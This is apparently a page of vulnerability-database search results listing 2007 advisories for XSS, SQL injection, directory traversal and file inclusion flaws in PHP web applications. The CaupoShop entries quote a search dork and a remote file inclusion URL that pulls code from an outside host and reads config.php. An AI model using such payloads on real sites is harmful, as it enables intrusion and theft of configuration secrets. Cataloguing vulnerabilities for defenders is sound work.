Lucene search
K

7210 matches found

Prion
Prion
added 2007/10/30 9:46 p.m.10 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via 1 the email parameter to index.php; or the command parameter to index.php in 2 the default action for the home page, 3 a currencies action, or 4 a basket action...

4.3CVSS6.3AI score0.01465EPSS
Exploits1References4
NVD
NVD
added 2007/10/30 9:46 p.m.14 views

CVE-2007-5719

SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...

7.5CVSS8.4AI score0.01006EPSS
Exploits0References4
NVD
NVD
added 2007/10/30 9:46 p.m.11 views

CVE-2007-5725

Multiple cross-site scripting XSS vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via 1 the email parameter to index.php; or the command parameter to index.php in 2 the default action for the home page, 3 a currencies action, or 4 a basket action...

4.3CVSS6AI score0.01465EPSS
Exploits1References4
Prion
Prion
added 2007/10/30 9:46 p.m.14 views

Sql injection

SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...

7.5CVSS9.1AI score0.01006EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2007/10/29 8:0 p.m.37 views

CVE-2007-5692

Multiple cross-site scripting XSS vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via 1 the lang parameter to integrator.php; 2 the token parameter in a New Password action, 3 the nidacl parameter in a Folder Properties action, or 4 the uid parameter...

5.4AI score0.04772EPSS
Exploits1References14
Packet Storm
Packet Storm
added 2007/10/29 12:0 a.m.23 views

cauposhop-rfi.txt

dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/10/29 12:0 a.m.16 views

Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities

Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabiliti...

Exploits0
seebug.org
seebug.org
added 2007/10/29 12:0 a.m.15 views

CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability

No description provided by source. ork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...

7.1AI score
Exploits0
NVD
NVD
added 2007/10/26 6:46 p.m.17 views

CVE-2007-5684

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...

7.5CVSS7.3AI score0.03024EPSS
Exploits0References2
Prion
Prion
added 2007/10/26 6:46 p.m.16 views

Directory traversal

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...

7.5CVSS7.7AI score0.03024EPSS
Exploits0References2Affected Software1
Cvelist
Cvelist
added 2007/10/26 6:0 p.m.21 views

CVE-2007-5684

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...

7.3AI score0.03024EPSS
Exploits0References2
CVE
CVE
added 2007/10/25 7:0 p.m.37 views

CVE-2003-1499

CVE-2003-1499 : A directory traversal flaw in Bytehoard 0.7’s index.php allows remote attackers to read arbitrary files by supplying a .. in the infolder parameter. The NVD entry lists CVSS v2 base metrics: AV:N/AC:L/Au:N/C:N/I:N/A:P with a base score of 5.0 (Medium) and network attack vector; ex...

5CVSS7AI score0.02827EPSS
Exploits1References5Affected Software1
Prion
Prion
added 2007/10/23 9:47 p.m.13 views

Directory traversal

Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to index.php...

7.5CVSS7.6AI score0.02368EPSS
Exploits1References4Affected Software1
seebug.org
seebug.org
added 2007/10/23 12:0 a.m.16 views

InstaGuide Weather Index.PHP文件包含漏洞

InstaGuide Weather是一款基于PHP的WEB应用程序。 InstaGuide Weather不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。 问题是'Index.PHP'脚本对用户提交的'PageName'参数缺少过滤,提交应用程序文件作为参数,可导致敏感信息泄露。 InstaGuide Weathe 目前没有解决方案提供: http://www.instaguide.com/index.php?PageName=products http://www.example.com/index.php?PageName=Local File%00...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/10/23 12:0 a.m.86 views

DM CMS Index.PHP SQL注入漏洞

DM CMS是一款基于PHP的WEB应用程序。 DM CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL攻击,获得敏感信息或操作数据库。 问题是由于'index.php'脚本对用户提交的'id'参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,攻击者可以获得敏感信息或操作数据库。 DMCMS 0.7 目前没有详细解决方案提供: http://sourceforge.net/projects/dmcms/ http://www.example.com/index.php?page=media&id=SQL INJECTION CODE GOES HE...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2007/10/22 12:0 a.m.26 views

deeemm CMS (dmcms) 0.7 - index.php SQL Injection

deeemm CMS dmcms 0.7 - index.php SQL Injection source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...

0.3AI score
Exploits0
Packet Storm
Packet Storm
added 2007/10/22 12:0 a.m.31 views

visolfi.txt

Title : VISO apps Local File Inclusion Vulnerability Description : VISO apps is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Software: : http://www.viventus.no/visoapps/ Author : d3hydr8 Homepage : http://www.darkc0de.com Original Post :...

7.4AI score
Exploits0
CVE
CVE
added 2007/10/20 10:0 a.m.55 views

CVE-2003-1412

CVE-2003-1412 affects GOsa (GOnicus System Administrator) 1.0. It is a PHP remote file inclusion vulnerability where the plugin parameter in index.php can be controlled to include arbitrary PHP code from several paths: 3fax/1blocklists/index.php, 6departamentadmin/index.php, 5terminals/index.php,...

6.8CVSS7.7AI score0.02691EPSS
Exploits1References6Affected Software1
CVE
CVE
added 2007/10/18 10:0 a.m.47 views

CVE-2002-2277

PortailPHP 0.99 contains an SQL injection in mod_search/index.php. The vulnerability allows remote attackers to inject SQL via (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin, potentially affecting confidentiality, integrity, and availability as i...

7.5CVSS8.8AI score0.01051EPSS
Exploits0References3Affected Software1
Cvelist
Cvelist
added 2007/10/18 10:0 a.m.19 views

CVE-2002-2277

SQL injection vulnerability in modsearch/index.php in PortailPHP 0.99 allows remote attackers to execute arbitrary SQL commands via the 1 $rech, 2 $BDTabdocs, 3 $BDTabfile, 4 $BDTabliens, 5 $BDTabfaq, or 6 $chemin variables...

8.4AI score0.01051EPSS
Exploits0References3
Rows per page
Query Builder